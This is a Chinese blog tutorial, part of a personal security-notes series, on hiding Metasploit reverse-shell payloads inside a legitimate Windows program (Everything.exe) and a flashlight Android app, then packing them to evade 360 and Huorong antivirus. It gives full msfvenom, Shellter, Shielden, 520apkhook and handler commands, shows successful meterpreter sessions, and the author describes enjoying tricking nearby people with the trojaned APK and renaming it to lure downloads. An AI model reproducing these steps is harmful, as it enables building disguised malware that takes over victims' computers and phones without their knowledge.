安全|MSF(3)——apk和exe的加马(过360、火绒)

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

文章目录
    • 前文链接
    • 工具地址
      • shielden
      • 520apkhook
    • exe 加马
      • shellter附加
        • 安装
        • 软件准备
        • 添加后门
        • 杀软测试
      • 加壳
        • 使用
        • 杀软测试
      • 连接测试
    • apk加马
      • 520apkhook加马
        • 使用
        • 测试连接
      • 杀软测试

前文链接
  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)——各种木马的生成及简单的免杀
工具地址 shielden
http://www.safengine.com/download/release.zip
520apkhook
https://github.com/cleverbao/520apkhook
exe 加马 我先前写的文章里免杀exe马的方式生成四个文件,上传的时候非常麻烦,而且python的meterpreter功能很少,一般在实际情况中需要上传exe马进行进一步控制,但是传一个exe马上去,不仅会被瞬间秒杀,还会被杀软断开连接,于是就有了以下的内容。
大致流程是先给一个正常的exe文件加后门,然后给他加壳。这样过杀软基本问题就不太大了。
先用kali生成一个exe的马,192.168.220.129是我kali的地址
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.220.129 lport=4444 -f exe -o shell.exe

使用杀毒软件扫描该文件
火绒
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

360
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

shellter附加
大概意思是把木马里的代码插入到正常的可执行文件中,这样增加木马的混淆性,使其达到免杀的效果。
安装 在这里用shellter工具。
新版的kali没有shellter了,所以要自己安装。
以下代码建议先sudo后用root执行。
apt-get update apt-get install shellter dpkg --add-architecture i386 && apt-get update && apt-get install wine32

安装好后直接在控制台输入shellter,显示如下即为安装完成
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

软件准备 先要准备一个32位的PE文件,尽量小一些,方便上传。
必须是32位
在这里我选用32位everything.exe,可点该链接下载
下载好以后是一个压缩包,解压之后把里面的everything.exe放到kali中
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

添加后门 启动shellter后,在选择模式后选择A,自动模式
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

这里要你输入PE文件的路径,直接输everything的绝对路径就好了
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

等待数分钟后,要选择是否启用隐身模式这里选择N
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

接下来按下图填就好了
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

在这里输入攻击机ip和监听端口,然后稍等一下生成木马
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

这个时候木马就已经生成成功了,生成的木马替换了原本PE文件的位置,原本的PE文件存在Shellter_Backups中
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

杀软测试 分别测试火绒和360
360
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

火绒
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

此时已经可以过360了
加壳
加壳用到的工具是Shielden
下载下来的Shielden是一个叫release的文件夹,直接运行里面的Shielden.exe即可,运行图如下
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

使用 这个工具非常简单,无脑操作即可
点击浏览,导入插入木马的Everything.exe
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

把检测选项的箭头全部打上
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

把保护选项的箭头全打上
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

把CheatDefender的箭头全打上
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

点击保护生成加壳后的文件
生成后的文件会在源文件名字后加上_se
生成的文件名为Everything_se.exe
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

杀软测试 360
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

火绒
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

此时已经可以绕过360和火绒了
连接测试
接下来测试一下能否正常使用
kali中msf设置如下
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.220.129 set lport 4444 run

可以看到,成功收到了回显
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

apk加马 本来我是不想做这个的,但是拿着这个马对周围的人坑蒙拐骗使人实在心情愉悦。于是就有了以下的部分。
大致流程就是先准备一个正常的apk文件,然后给他附加shellcode,当受害者运行该文件,就会执行shellcode,从而被控制。
由于以下的全部操作都是真实环境,所以在这里我使用了内网穿透和端口转发技术,具体的操作我心情好可能会写,再这里我的ip和端口都打码或用其他数据代替。能明白原理就行了。
先生成一个apk的马
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.220.129 lport=6666 R>1.apk

使用杀毒软件扫描该文件
火绒
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

手机管家
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

520apkhook加马
520apkhook是一款基于python3和Java的代码注入工具。用作者的话说是
将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。
使用该工具加马,要自己先准备一个apk文件,可以到网上去下那种小工具的apk文件,文件相对比较小,也比较容易诱骗。
在这里我准备了一个手电筒的apk
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

使用 把apk文件改个名字,放到kali中,方便后期加马
例如我在这里将其改名为flash.apk,并且放到 /home/kali/520apkhook/ 目录下
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

接下来直接执行如下代码
python main.py --lhost 192.168.220.129 --lport 6666 -n /home/kali/520apkhook/flash.apk

其中lhost填你自己的ip,lport填你自己监听的端口
如下图即为生成成功
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

此时在WorkDir目录下生成如下文件
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

这个AllFinish.apk就是加马的apk文件
将其改名为手电筒,方便进行下一步诱骗下载
在这里我就不改名了,并且直接转移到android上
这个handler.rc是msf的执行文件,如果是内网穿透需要手动修改内容
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

接下来终端运行msfconsole -r handler.rc打开msf控制台并自动监听
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

测试连接 在android手机上运行该apk文件
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

只是提示签名不一致,继续安装,并运行该文件。
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

也是成功收到连接,得到meterpreter.
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

获取系统信息
杀软测试
【安全|MSF(3)——apk和exe的加马(过360、火绒)】测试火绒
安全|MSF(3)——apk和exe的加马(过360、火绒)
文章图片

火绒不报毒

    推荐阅读